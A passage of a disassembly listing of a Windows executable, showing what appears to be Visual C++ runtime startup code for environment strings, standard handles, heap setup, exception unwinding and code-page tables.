inc dword ptr [eax]
pop ebp
retn
sub_402FE1 endp
; =============== S U B R O U T I N E =======================================
sub_403195 proc near ; CODE XREF: .text:004029AD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_407230
push ebx
push ebp
mov ebp, dword_4050B8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4031E3
call ebp ; dword_4050B8
mov esi, eax
cmp esi, ebx
jz short loc_4031C4
mov dword_407230, 1
jmp short loc_4031EC
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403195+21�j
call dword_4050BC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_4032BE
mov dword_407230, 2
jmp loc_403272
; ---------------------------------------------------------------------------
loc_4031E3: ; CODE XREF: sub_403195+19�j
cmp eax, 1
jnz loc_40326D
loc_4031EC: ; CODE XREF: sub_403195+2D�j
cmp esi, ebx
jnz short loc_4031FC
call ebp ; dword_4050B8
mov esi, eax
cmp esi, ebx
jz loc_4032BE
loc_4031FC: ; CODE XREF: sub_403195+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403211
loc_403203: ; CODE XREF: sub_403195+73�j
; sub_403195+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
loc_403211: ; CODE XREF: sub_403195+6C�j
sub eax, esi
mov edi, dword_4050C0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_4050C0
mov ebp, eax
cmp ebp, ebx
jz short loc_403262
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403262
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_4050C0
test eax, eax
jnz short loc_40325E
push [esp+18h+var_8]
call sub_403D77
pop ecx
mov [esp+18h+var_8], ebx
loc_40325E: ; CODE XREF: sub_403195+B9�j
mov ebx, [esp+18h+var_8]
loc_403262: ; CODE XREF: sub_403195+99�j
; sub_403195+A8�j
push esi
call dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_40326D: ; CODE XREF: sub_403195+51�j
cmp eax, 2
jnz short loc_4032BE
loc_403272: ; CODE XREF: sub_403195+49�j
cmp edi, ebx
jnz short loc_403282
call dword_4050BC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_4032BE
loc_403282: ; CODE XREF: sub_403195+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_403292
loc_403288: ; CODE XREF: sub_403195+F6�j
; sub_403195+FB�j
inc eax
cmp [eax], bl
jnz short loc_403288
inc eax
cmp [eax], bl
jnz short loc_403288
loc_403292: ; CODE XREF: sub_403195+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4032A8
xor esi, esi
jmp short loc_4032B3
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_403195+10D�j
push ebp
push edi
push esi
call sub_402380
add esp, 0Ch
loc_4032B3: ; CODE XREF: sub_403195+111�j
push edi
call dword_4050E8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_4032BE: ; CODE XREF: sub_403195+39�j
; sub_403195+61�j ...
xor eax, eax
loc_4032C0: ; CODE XREF: sub_403195+D6�j
; sub_403195+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_403195 endp
; =============== S U B R O U T I N E =======================================
sub_4032C7 proc near ; CODE XREF: .text:0040299D�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403DA6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4032E7
push 1Bh
call sub_402A24
pop ecx
loc_4032E7: ; CODE XREF: sub_4032C7+16�j
mov dword_4074E0, esi
mov dword_4075E0, 20h
lea eax, [esi+100h]
loc_4032FD: ; CODE XREF: sub_4032C7+52�j
cmp esi, eax
jnb short loc_40331B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_4074E0
add esi, 8
add eax, 100h
jmp short loc_4032FD
; ---------------------------------------------------------------------------
loc_40331B: ; CODE XREF: sub_4032C7+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4050CC ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_4033F7
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_4033F7
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403351
mov esi, eax
loc_403351: ; CODE XREF: sub_4032C7+86�j
cmp dword_4075E0, esi
jge short loc_4033AB
mov edi, offset dword_4074E4
loc_40335E: ; CODE XREF: sub_4032C7+DA�j
push 100h
call sub_403DA6
test eax, eax
pop ecx
jz short loc_4033A5
add dword_4075E0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40337C: ; CODE XREF: sub_4032C7+CF�j
cmp eax, ecx
jnb short loc_403398
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40337C
; ---------------------------------------------------------------------------
loc_403398: ; CODE XREF: sub_4032C7+B7�j
add edi, 4
cmp dword_4075E0, esi
jl short loc_40335E
jmp short loc_4033AB
; ---------------------------------------------------------------------------
loc_4033A5: ; CODE XREF: sub_4032C7+A4�j
mov esi, dword_4075E0
loc_4033AB: ; CODE XREF: sub_4032C7+90�j
; sub_4032C7+DC�j
xor edi, edi
test esi, esi
jle short loc_4033F7
loc_4033B1: ; CODE XREF: sub_4032C7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4033EE
mov cl, [ebp+0]
test cl, 1
jz short loc_4033EE
test cl, 8
jnz short loc_4033D0
push eax
call dword_4050A0 ; GetFileType
test eax, eax
jz short loc_4033EE
loc_4033D0: ; CODE XREF: sub_4032C7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_4074E0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4033EE: ; CODE XREF: sub_4032C7+EF�j
; sub_4032C7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4033B1
loc_4033F7: ; CODE XREF: sub_4032C7+65�j
; sub_4032C7+71�j ...
xor ebx, ebx
loc_4033F9: ; CODE XREF: sub_4032C7+195�j
mov eax, dword_4074E0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403454
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403414
push 0FFFFFFF6h
pop eax
jmp short loc_40341E
; ---------------------------------------------------------------------------
loc_403414: ; CODE XREF: sub_4032C7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40341E: ; CODE XREF: sub_4032C7+14B�j
push eax
call dword_4050A4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403443
push edi
call dword_4050A0 ; GetFileType
test eax, eax
jz short loc_403443
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403449
loc_403443: ; CODE XREF: sub_4032C7+163�j
; sub_4032C7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403449: ; CODE XREF: sub_4032C7+17A�j
cmp eax, 3
jnz short loc_403458
or byte ptr [esi+4], 8
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403454: ; CODE XREF: sub_4032C7+13E�j
or byte ptr [esi+4], 80h
loc_403458: ; CODE XREF: sub_4032C7+180�j
; sub_4032C7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_4033F9
push dword_4075E0
call dword_4050A8 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4032C7 endp
; =============== S U B R O U T I N E =======================================
sub_403472 proc near ; CODE XREF: .text:00402988�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_405098 ; HeapCreate
test eax, eax
mov dword_4074C8, eax
jz short loc_4034A7
call sub_403E1A
test eax, eax
jnz short loc_4034AA
push dword_4074C8
call dword_40509C ; HeapDestroy
loc_4034A7: ; CODE XREF: sub_403472+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403472+27�j
push 1
pop eax
retn
sub_403472 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B0 proc near ; CODE XREF: sub_4035A8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4034C8
push [ebp+arg_0]
call sub_404DA8 ; RtlUnwind
loc_4034C8: ; DATA XREF: sub_4034B0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B0 endp
; =============== S U B R O U T I N E =======================================
sub_4034D0 proc near ; DATA XREF: sub_4034F2+A�o
; .text:00403563�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4034F1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4034F1: ; CODE XREF: sub_4034D0+10�j
retn
sub_4034D0 endp
; =============== S U B R O U T I N E =======================================
sub_4034F2 proc near ; CODE XREF: sub_4035A8+67�p
; sub_4035A8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4034D0
push large dword ptr fs:0
mov large fs:0, esp
loc_40350F: ; CODE XREF: sub_4034F2:loc_40354A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40354C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40354C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40354A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403586
call dword ptr [ebx+esi*4+8]
loc_40354A: ; CODE XREF: sub_4034F2+44�j
jmp short loc_40350F
; ---------------------------------------------------------------------------
loc_40354C: ; CODE XREF: sub_4034F2+2A�j
; sub_4034F2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4034F2 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4034D0
jnz short locret_40357C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40357C
mov eax, 1
locret_40357C: ; CODE XREF: .text:0040356A�j
; .text:00403575�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406F1C
jmp short loc_403590
; =============== S U B R O U T I N E =======================================
sub_403586 proc near ; CODE XREF: sub_4034F2+4F�p
; sub_4035A8+78�p
push ebx
push ecx
mov ebx, offset dword_406F1C
mov ecx, [ebp+8]
loc_403590: ; CODE XREF: .text:00403584�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403586 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A8 proc near ; DATA XREF: .text:00402938�o
; sub_40380C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403648
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4035DB: ; CODE XREF: sub_4035A8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403641
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40362F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40362F
js short loc_40363A
mov edi, [ebx+8]
push ebx
call sub_4034B0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4034F2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403586
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40362F: ; CODE XREF: sub_4035A8+40�j
; sub_4035A8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4035DB
; ---------------------------------------------------------------------------
loc_40363A: ; CODE XREF: sub_4035A8+54�j
mov eax, 0
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403641: ; CODE XREF: sub_4035A8+36�j
mov eax, 1
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403648: ; CODE XREF: sub_4035A8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4034F2
add esp, 8
pop ebp
mov eax, 1
loc_40365D: ; CODE XREF: sub_4035A8+97�j
; sub_4035A8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4035A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4034F2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403680 proc near ; CODE XREF: sub_402A24+9�p
; sub_402A49+9�p
mov eax, dword_4070D8
cmp eax, 1
jz short loc_403697
test eax, eax
jnz short locret_4036B8
cmp dword_406C64, 1
jnz short locret_4036B8
loc_403697: ; CODE XREF: sub_403680+8�j
push 0FCh
call sub_4036B9
mov eax, dword_407234
pop ecx
test eax, eax
jz short loc_4036AD
call eax ; dword_407234
loc_4036AD: ; CODE XREF: sub_403680+29�j
push 0FFh
call sub_4036B9
pop ecx
locret_4036B8: ; CODE XREF: sub_403680+C�j
; sub_403680+15�j
retn
sub_403680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036B9 proc near ; CODE XREF: sub_402A24+12�p
; sub_402A49+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406F30
loc_4036CC: ; CODE XREF: sub_4036B9+20�j
cmp edx, [eax]
jz short loc_4036DB
add eax, 8
inc ecx
cmp eax, offset byte_406FC0
jl short loc_4036CC
loc_4036DB: ; CODE XREF: sub_4036B9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406F30[esi]
jnz loc_403809
mov eax, dword_4070D8
cmp eax, 1
jz loc_4037E3
test eax, eax
jnz short loc_40370C
cmp dword_406C64, 1
jz loc_4037E3
loc_40370C: ; CODE XREF: sub_4036B9+44�j
cmp edx, 0FCh
jz loc_403809
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
test eax, eax
jnz short loc_403743
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402810
pop ecx
pop ecx
loc_403743: ; CODE XREF: sub_4036B9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402300
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403786
lea eax, [ebp+var_1A4]
push eax
call sub_402300
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4046F0
add esp, 10h
loc_403786: ; CODE XREF: sub_4036B9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402810
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402820
lea eax, [ebp+var_A0]
push offset asc_40540C ; "\n\n"
push eax
call sub_402820
push off_406F34[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402820
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404663
add esp, 2Ch
pop edi
jmp short loc_403809
; ---------------------------------------------------------------------------
loc_4037E3: ; CODE XREF: sub_4036B9+3C�j
; sub_4036B9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406F34[esi]
push 0
push eax
push dword ptr [esi]
call sub_402300
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4050A4 ; GetStdHandle
push eax
call dword_405088 ; WriteFile
loc_403809: ; CODE XREF: sub_4036B9+2E�j
; sub_4036B9+59�j ...
pop esi
leave
retn
sub_4036B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40380C proc near ; CODE XREF: sub_402B3C+5E�p
; sub_403BD6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405450
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_407238
xor ebx, ebx
cmp eax, ebx
jnz short loc_40387B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405448
push esi
call dword_40507C ; GetStringTypeW
test eax, eax
jz short loc_403859
mov eax, esi
jmp short loc_403876
; ---------------------------------------------------------------------------
loc_403859: ; CODE XREF: sub_40380C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4070C8
push esi
push ebx
call dword_405080 ; GetStringTypeA
test eax, eax
jz loc_403941
push 2
pop eax
loc_403876: ; CODE XREF: sub_40380C+4B�j
mov dword_407238, eax
loc_40387B: ; CODE XREF: sub_40380C+2F�j
cmp eax, 2
jnz short loc_4038A4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40388C
mov eax, dword_407254
loc_40388C: ; CODE XREF: sub_40380C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_405080 ; GetStringTypeA
jmp loc_403943
; ---------------------------------------------------------------------------
loc_4038A4: ; CODE XREF: sub_40380C+72�j
cmp eax, 1
jnz loc_403941
cmp [ebp+arg_10], ebx
jnz short loc_4038BA
mov eax, dword_407264
mov [ebp+arg_10], eax
loc_4038BA: ; CODE XREF: sub_40380C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_405084 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403941
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4022A0
add esp, 0Ch
jmp short loc_403910
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403910: ; CODE XREF: sub_40380C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403941
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_405084 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403941
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_40507C ; GetStringTypeW
jmp short loc_403943
; ---------------------------------------------------------------------------
loc_403941: ; CODE XREF: sub_40380C+61�j
; sub_40380C+9B�j ...
xor eax, eax
loc_403943: ; CODE XREF: sub_40380C+93�j
; sub_40380C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40380C endp
; =============== S U B R O U T I N E =======================================
sub_403955 proc near ; CODE XREF: sub_402E37+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403966
add esp, 0Ch
retn
sub_403955 endp
; =============== S U B R O U T I N E =======================================
sub_403966 proc near ; CODE XREF: sub_403955+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_4073C1[eax], cl
jnz short loc_403993
cmp [esp+arg_4], 0
jz short loc_40398C
movzx eax, word_406C7A[eax*2]
and eax, [esp+arg_4]
jmp short loc_40398E
; ---------------------------------------------------------------------------
loc_40398C: ; CODE XREF: sub_403966+16�j
xor eax, eax
loc_40398E: ; CODE XREF: sub_403966+24�j
test eax, eax
jnz short loc_403993
retn
; ---------------------------------------------------------------------------
loc_403993: ; CODE XREF: sub_403966+F�j
; sub_403966+2A�j
push 1
pop eax
retn
sub_403966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403997 proc near ; CODE XREF: sub_403D5B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403B30 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_407290
mov [ebp+arg_0], esi
jz loc_403B24
xor ebx, ebx
cmp esi, ebx
jz loc_403B1A
xor edx, edx
mov eax, offset dword_406FC8
loc_4039CB: ; CODE XREF: sub_403997+41�j
cmp [eax], esi
jz short loc_403A41
add eax, 30h
inc edx
cmp eax, offset dword_4070B8
jl short loc_4039CB
lea eax, [ebp+var_18]
push eax
push esi
call dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403B12
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
cmp [ebp+var_18], 1
mov dword_407290, esi
rep stosd
stosb
mov dword_4074C4, ebx
jbe loc_403B00
cmp [ebp+var_12], 0
jz loc_403AD6
lea ecx, [ebp+var_11]
loc_403A1E: ; CODE XREF: sub_403997+139�j
mov dl, [ecx]
test dl, dl
jz loc_403AD6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_403A2F: ; CODE XREF: sub_403997+A8�j
cmp eax, edx
ja loc_403ACA
or byte_4073C1[eax], 4
inc eax
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A41: ; CODE XREF: sub_403997+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406FD8[esi]
loc_403A5D: ; CODE XREF: sub_403997+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_403A90
loc_403A64: ; CODE XREF: sub_403997+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_403A90
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403A89
mov edx, [ebp+var_4]
mov dl, byte_406FC0[edx]
loc_403A7E: ; CODE XREF: sub_403997+F0�j
or byte_4073C1[eax], dl
inc eax
cmp eax, edi
jbe short loc_403A7E
loc_403A89: ; CODE XREF: sub_403997+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403A64
loc_403A90: ; CODE XREF: sub_403997+CB�j
; sub_403997+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_403A5D
mov eax, [ebp+arg_0]
mov dword_4072AC, 1
push eax
mov dword_407290, eax
call sub_403B7A
lea esi, dword_406FCC[esi]
mov edi, offset dword_4072A0
movsd
movsd
pop ecx
mov dword_4074C4, eax
movsd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403ACA: ; CODE XREF: sub_403997+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_403A1E
loc_403AD6: ; CODE XREF: sub_403997+7E�j
; sub_403997+8B�j
push 1
pop eax
loc_403AD9: ; CODE XREF: sub_403997+14F�j
or byte_4073C1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_403AD9
push esi
call sub_403B7A
pop ecx
mov dword_4074C4, eax
mov dword_4072AC, 1
jmp short loc_403B06
; ---------------------------------------------------------------------------
loc_403B00: ; CODE XREF: sub_403997+74�j
mov dword_4072AC, ebx
loc_403B06: ; CODE XREF: sub_403997+167�j
xor eax, eax
mov edi, offset dword_4072A0
stosd
stosd
stosd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_403997+51�j
cmp dword_40723C, ebx
jz short loc_403B28
loc_403B1A: ; CODE XREF: sub_403997+27�j
call sub_403BAD
loc_403B1F: ; CODE XREF: sub_403997+131�j
; sub_403997+179�j
call sub_403BD6
loc_403B24: ; CODE XREF: sub_403997+1D�j
xor eax, eax
jmp short loc_403B2B
; ---------------------------------------------------------------------------
loc_403B28: ; CODE XREF: sub_403997+181�j
or eax, 0FFFFFFFFh
loc_403B2B: ; CODE XREF: sub_403997+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403997 endp
; =============== S U B R O U T I N E =======================================
sub_403B30 proc near ; CODE XREF: sub_403997+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_40723C, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403B50
mov dword_40723C, 1
jmp dword_405070
; ---------------------------------------------------------------------------
loc_403B50: ; CODE XREF: sub_403B30+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403B65
mov dword_40723C, 1
jmp dword_405074
; ---------------------------------------------------------------------------
loc_403B65: ; CODE XREF: sub_403B30+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403B79
mov eax, dword_407264
mov dword_40723C, 1
locret_403B79: ; CODE XREF: sub_403B30+38�j
retn
sub_403B30 endp
; =============== S U B R O U T I N E =======================================
sub_403B7A proc near ; CODE XREF: sub_403997+118�p
; sub_403997+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403BA7
sub eax, 4
jz short loc_403BA1
sub eax, 0Dh
jz short loc_403B9B
dec eax
jz short loc_403B95
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403B95: ; CODE XREF: sub_403B7A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403B9B: ; CODE XREF: sub_403B7A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403BA1: ; CODE XREF: sub_403B7A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403BA7: ; CODE XREF: sub_403B7A+9�j
mov eax, 411h
retn
sub_403B7A endp
; =============== S U B R O U T I N E =======================================
sub_403BAD proc near ; CODE XREF: sub_403997:loc_403B1A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4073C0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4072A0
mov dword_407290, eax
mov dword_4072AC, eax
mov dword_4074C4, eax
stosd
stosd
stosd
pop edi
retn
sub_403BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD6 proc near ; CODE XREF: sub_403997:loc_403B1F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_407290
call dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403D0F
xor eax, eax
mov esi, 100h
loc_403C00: ; CODE XREF: sub_403BD6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403C00
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403C51
push ebx
push edi
lea edx, [ebp+var_D]
loc_403C1F: ; CODE XREF: sub_403BD6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
